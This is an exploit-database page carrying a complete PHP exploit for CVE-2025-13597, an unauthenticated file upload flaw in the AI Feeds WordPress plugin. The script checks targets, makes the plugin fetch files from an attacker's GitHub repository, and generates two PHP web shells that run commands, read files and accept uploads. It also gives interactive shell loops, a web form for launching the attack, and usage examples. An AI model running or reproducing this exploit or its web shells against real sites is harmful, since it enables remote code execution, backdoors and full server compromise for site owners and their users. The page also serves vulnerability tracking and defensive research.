Vulners
Lucene search
📄 WordPress AI Feeds 1.0.11 Shell Upload
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Exploit for CVE-2025-13597 | 25 Nov 202517:43 | – | githubexploit |
 | CVE-2025-13597 | 25 Nov 202521:00 | – | circl |
 | WordPress plugin AI Feeds 代码问题漏洞 | 25 Nov 202500:00 | – | cnnvd |
 | WordPress AI Feeds plugin arbitrary file upload vulnerability | 27 Nov 202500:00 | – | cnvd |
 | CVE-2025-13597 | 25 Nov 202522:28 | – | cve |
 | CVE-2025-13597 AI Feeds <= 1.0.11 - Unauthenticated Arbitrary File Upload | 25 Nov 202522:28 | – | cvelist |
 | EUVD-2025-199660 | 26 Nov 202500:30 | – | euvd |
 | CVE-2025-13597 | 25 Nov 202523:15 | – | nvd |
 | 📄 AI Plugins 1.10.9 Shell Upload | 3 Dec 202500:00 | – | packetstorm |
 | WordPress AI Feeds plugin <= 1.0.11 - Unauthenticated Arbitrary File Upload vulnerability | 26 Nov 202506:48 | – | patchstack |
10
=============================================================================================================================================
| # Title : AI Feeds 1.0.11 Unauthenticated RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://ai.cibeles.net/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/212113/ & CVE-2025-13597
[+] Summary :
an unauthenticated arbitrary file upload vulnerability in the AI Feeds plugin for WordPress versions 1.0.11 and earlier.
The vulnerability allows unauthenticated attackers to upload arbitrary files, including PHP webshells, by exploiting the GitHub integration functionality, leading to remote code execution and complete server compromise.
The vulnerability exists in the actualizador_git.php file which provides unauthenticated access to download and execute files from arbitrary GitHub repositories without proper security controls.
[+] POC :
# Execute a single command
`php poc.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -c 'id'`
# Interactive shell
`php poc.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -i`
# Create a shell for the repo
`php poc.php --create-shell`
#!/usr/bin/env php
<?php
/**
* AI Feeds <= 1.0.11 - Unauthenticated Arbitrary File Upload RCE Exploit (CVE-2025-13597)
* Author: indoushka
* Vendor: https://ai.cibeles.net/
* Vulnerable Versions: <= 1.0.11
*/
class AIFeedsExploit {
private $target;
public function __construct($target_url) {
$this->target = rtrim($target_url, '/');
}
public function check_vulnerability() {
echo "[*] Checking if target is vulnerable...\n";
// Check if AI Feeds plugin exists
$plugin_path = $this->target . '/wp-content/plugins/ai-feeds/';
$context = stream_context_create([
'http' => [
'method' => 'GET',
'timeout' => 10,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]
]);
// Check for plugin directory
$response = @file_get_contents($plugin_path, false, $context);
if ($response === false) {
// Check for actualizador_git.php directly
$exploit_url = $this->target . '/wp-content/plugins/ai-feeds/actualizador_git.php';
$response = @file_get_contents($exploit_url, false, $context);
if ($response !== false) {
echo "[+] AI Feeds plugin detected - likely vulnerable\n";
return true;
}
} else {
echo "[+] AI Feeds plugin directory found - likely vulnerable\n";
return true;
}
echo "[-] AI Feeds plugin not found or not accessible\n";
return false;
}
public function exploit($owner, $repo, $token, $command = 'whoami') {
echo "[*] Exploiting actualizador_git.php vulnerability...\n";
echo "[*] Target: " . $this->target . "\n";
echo "[*] GitHub Repository: {$owner}/{$repo}\n";
$exploit_url = $this->target . '/wp-content/plugins/ai-feeds/actualizador_git.php';
$params = [
'owner' => $owner,
'repo' => $repo,
'ref' => 'main',
'token' => $token
];
$query_string = http_build_query($params);
$full_url = $exploit_url . '?' . $query_string;
echo "[*] Sending exploit request...\n";
echo "[*] URL: " . $full_url . "\n";
$context = stream_context_create([
'http' => [
'method' => 'GET',
'timeout' => 30,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]
]);
$response = @file_get_contents($full_url, false, $context);
if ($response === false) {
echo "[-] Exploit request failed\n";
return false;
}
echo "[+] Exploit executed. Response:\n";
echo $response . "\n";
// Test shell access
echo "\n[*] Testing shell access...\n";
$this->test_shell($command);
return true;
}
private function test_shell($command) {
$shell_url = $this->target . '/wp-content/plugins/ai-feeds/shell.php';
$test_url = $shell_url . '?cmd=' . urlencode($command);
echo "[*] Testing command: {$command}\n";
echo "[*] Shell URL: {$shell_url}?cmd=COMMAND\n";
$context = stream_context_create([
'http' => [
'method' => 'GET',
'timeout' => 10,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]
]);
$response = @file_get_contents($test_url, false, $context);
if ($response === false) {
echo "[-] Shell not accessible or command failed\n";
} else {
echo "[+] Command output:\n";
echo $response . "\n";
}
}
public function create_malicious_repo() {
echo "[*] Creating malicious shell.php for GitHub repository...\n";
$shell_content = '<?php
// AI Feeds Exploit Web Shell
error_reporting(0);
if(isset($_GET[\'cmd\'])) {
system($_GET[\'cmd\']);
echo "\n";
}
if(isset($_POST[\'cmd\'])) {
system($_POST[\'cmd\']);
echo "\n";
}
if(isset($_POST[\'upload\'])) {
move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\']);
echo "File uploaded: " . $_FILES[\'file\'][\'name\'];
}
?>';
file_put_contents('shell.php', $shell_content);
echo "[+] Created shell.php - upload this to your GitHub repository\n";
echo "[+] Repository structure should be: /shell.php in main branch\n";
// Also create a more advanced shell
$advanced_shell = '<?php
// Advanced AI Feeds Web Shell
class AIShell {
public function execute($cmd) {
$output = [];
$return_code = 0;
exec($cmd . " 2>&1", $output, $return_code);
return implode("\n", $output);
}
public function listFiles($dir = ".") {
return scandir($dir);
}
public function readFile($file) {
return file_get_contents($file);
}
}
$ai_shell = new AIShell();
if(isset($_GET[\'action\'])) {
switch($_GET[\'action\']) {
case \'exec\':
echo $ai_shell->execute($_GET[\'cmd\']);
break;
case \'ls\':
$dir = isset($_GET[\'dir\']) ? $_GET[\'dir\'] : \'.\';
print_r($ai_shell->listFiles($dir));
break;
case \'cat\':
if(isset($_GET[\'file\'])) {
echo $ai_shell->readFile($_GET[\'file\']);
}
break;
default:
echo "Available actions: exec, ls, cat";
}
} else {
echo "AI Feeds Web Shell - Ready";
}
?>';
file_put_contents('advanced_shell.php', $advanced_shell);
echo "[+] Created advanced_shell.php with more features\n";
}
public function interactive_shell() {
$shell_url = $this->target . '/wp-content/plugins/ai-feeds/shell.php';
echo "[+] Starting interactive shell...\n";
echo "[+] Shell URL: {$shell_url}\n";
echo "[+] Type 'exit' to quit\n\n";
while (true) {
echo "cmd> ";
$command = trim(fgets(STDIN));
if ($command === 'exit') {
break;
}
if (!empty($command)) {
$test_url = $shell_url . '?cmd=' . urlencode($command);
$context = stream_context_create([
'http' => [
'method' => 'GET',
'timeout' => 10
]
]);
$response = @file_get_contents($test_url, false, $context);
if ($response !== false) {
echo $response . "\n";
} else {
echo "[-] Command failed or shell not accessible\n";
}
}
}
}
public function advanced_shell() {
$shell_url = $this->target . '/wp-content/plugins/ai-feeds/advanced_shell.php';
echo "[+] Starting advanced shell...\n";
echo "[+] Available commands:\n";
echo " ?action=exec&cmd=COMMAND - Execute command\n";
echo " ?action=ls&dir=DIRECTORY - List files\n";
echo " ?action=cat&file=FILENAME - Read file\n";
echo "[+] Type 'exit' to quit\n\n";
while (true) {
echo "ai-feeds> ";
$input = trim(fgets(STDIN));
if ($input === 'exit') {
break;
}
if (!empty($input)) {
if (strpos($input, 'ls') === 0) {
$parts = explode(' ', $input);
$dir = isset($parts[1]) ? $parts[1] : '.';
$test_url = $shell_url . '?action=ls&dir=' . urlencode($dir);
} elseif (strpos($input, 'cat') === 0) {
$parts = explode(' ', $input);
if (isset($parts[1])) {
$test_url = $shell_url . '?action=cat&file=' . urlencode($parts[1]);
} else {
echo "Usage: cat filename\n";
continue;
}
} else {
$test_url = $shell_url . '?action=exec&cmd=' . urlencode($input);
}
$context = stream_context_create([
'http' => [
'method' => 'GET',
'timeout' => 10
]
]);
$response = @file_get_contents($test_url, false, $context);
if ($response !== false) {
echo $response . "\n";
} else {
echo "[-] Command failed or advanced shell not accessible\n";
}
}
}
}
}
// Command line interface
if (php_sapi_name() === 'cli') {
echo "
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
AI Feeds <= 1.0.11 Unauthenticated RCE Exploit (CVE-2025-13597)
By: indoushka
\n";
$options = getopt("t:o:r:k:c:iah", [
"target:",
"owner:",
"repo:",
"token:",
"command:",
"interactive",
"advanced",
"help",
"create-shell"
]);
if (isset($options['h']) || isset($options['help']) || $argc == 1) {
echo "Usage: php ai_feeds_exploit.php [options]\n";
echo "Options:\n";
echo " -t, --target Target URL (required)\n";
echo " -o, --owner GitHub repository owner (required)\n";
echo " -r, --repo GitHub repository name (required)\n";
echo " -k, --token GitHub Personal Access Token (required)\n";
echo " -c, --command Command to execute (default: whoami)\n";
echo " -i, --interactive Start interactive shell\n";
echo " -a, --advanced Use advanced shell features\n";
echo " --create-shell Create malicious shell.php for GitHub repo\n";
echo " -h, --help Show this help message\n";
echo "\nExamples:\n";
echo " php ai_feeds_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -c 'id'\n";
echo " php ai_feeds_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -i\n";
echo " php ai_feeds_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -a\n";
echo " php ai_feeds_exploit.php --create-shell\n";
exit(1);
}
if (isset($options['create-shell'])) {
$exploit = new AIFeedsExploit('');
$exploit->create_malicious_repo();
exit(0);
}
if (!isset($options['t']) && !isset($options['target'])) {
echo "Error: Target URL is required\n";
exit(1);
}
if (!isset($options['o']) && !isset($options['owner'])) {
echo "Error: GitHub owner is required\n";
exit(1);
}
if (!isset($options['r']) && !isset($options['repo'])) {
echo "Error: GitHub repository is required\n";
exit(1);
}
if (!isset($options['k']) && !isset($options['token'])) {
echo "Error: GitHub token is required\n";
exit(1);
}
$target = isset($options['t']) ? $options['t'] : $options['target'];
$owner = isset($options['o']) ? $options['o'] : $options['owner'];
$repo = isset($options['r']) ? $options['r'] : $options['repo'];
$token = isset($options['k']) ? $options['k'] : $options['token'];
$command = isset($options['c']) ? $options['c'] : (isset($options['command']) ? $options['command'] : 'whoami');
$exploit = new AIFeedsExploit($target);
// Check vulnerability first
if (!$exploit->check_vulnerability()) {
echo "[-] Target does not appear to be vulnerable\n";
exit(1);
}
if (isset($options['a']) || isset($options['advanced'])) {
// Use advanced shell
$exploit->exploit($owner, $repo, $token, 'echo "Advanced shell installed"');
$exploit->advanced_shell();
} elseif (isset($options['i']) || isset($options['interactive'])) {
// Interactive shell
$exploit->exploit($owner, $repo, $token, 'echo "Shell installed successfully"');
$exploit->interactive_shell();
} else {
// Single command execution
$exploit->exploit($owner, $repo, $token, $command);
}
} else {
// Web interface
if (isset($_POST['exploit'])) {
$target = $_POST['target'] ?? '';
$owner = $_POST['owner'] ?? '';
$repo = $_POST['repo'] ?? '';
$token = $_POST['token'] ?? '';
$command = $_POST['command'] ?? 'whoami';
if ($target && $owner && $repo && $token) {
$exploit = new AIFeedsExploit($target);
ob_start();
$exploit->check_vulnerability();
$exploit->exploit($owner, $repo, $token, $command);
$output = ob_get_clean();
echo "<pre>$output</pre>";
} else {
echo "<div style='color: red;'>All fields are required</div>";
}
} else {
echo '<!DOCTYPE html>
<html>
<head>
<title>AI Feeds RCE Exploit</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px; }
.container { max-width: 600px; margin: 0 auto; }
.form-group { margin-bottom: 15px; }
label { display: block; margin-bottom: 5px; font-weight: bold; }
input[type="text"], input[type="password"] {
width: 100%; padding: 8px; border: 1px solid #ddd; border-radius: 4px;
}
button {
background: #007cba; color: white; padding: 10px 20px;
border: none; border-radius: 4px; cursor: pointer;
}
.help { font-size: 12px; color: #666; margin-top: 5px; }
</style>
</head>
<body>
<div class="container">
<h1>AI Feeds RCE Exploit (CVE-2025-13597)</h1>
<form method="post">
<input type="hidden" name="exploit" value="1">
<div class="form-group">
<label for="target">Target URL:</label>
<input type="text" id="target" name="target" placeholder="https://example.com" required>
<div class="help">Full URL of the WordPress site</div>
</div>
<div class="form-group">
<label for="owner">GitHub Owner:</label>
<input type="text" id="owner" name="owner" placeholder="yourusername" required>
<div class="help">GitHub username or organization name</div>
</div>
<div class="form-group">
<label for="repo">GitHub Repository:</label>
<input type="text" id="repo" name="repo" placeholder="malicious-repo" required>
<div class="help">Repository containing shell.php</div>
</div>
<div class="form-group">
<label for="token">GitHub Token:</label>
<input type="password" id="token" name="token" placeholder="ghp_xxx" required>
<div class="help">GitHub Personal Access Token with repo access</div>
</div>
<div class="form-group">
<label for="command">Command:</label>
<input type="text" id="command" name="command" value="whoami">
<div class="help">Command to execute on target</div>
</div>
<button type="submit">Execute Exploit</button>
</form>
<div style="margin-top: 30px; padding: 15px; background: #f5f5f5; border-radius: 4px;">
<h3>Setup Instructions:</h3>
<ol>
<li>Create a GitHub repository with a shell.php file</li>
<li>Generate a GitHub Personal Access Token with repo permissions</li>
<li>Fill in the form above and execute</li>
<li>Access shell at: /wp-content/plugins/ai-feeds/shell.php?cmd=COMMAND</li>
</ol>
</div>
</div>
</body>
</html>';
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Mar 2026 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.19.8
EPSS0.00823
SSVC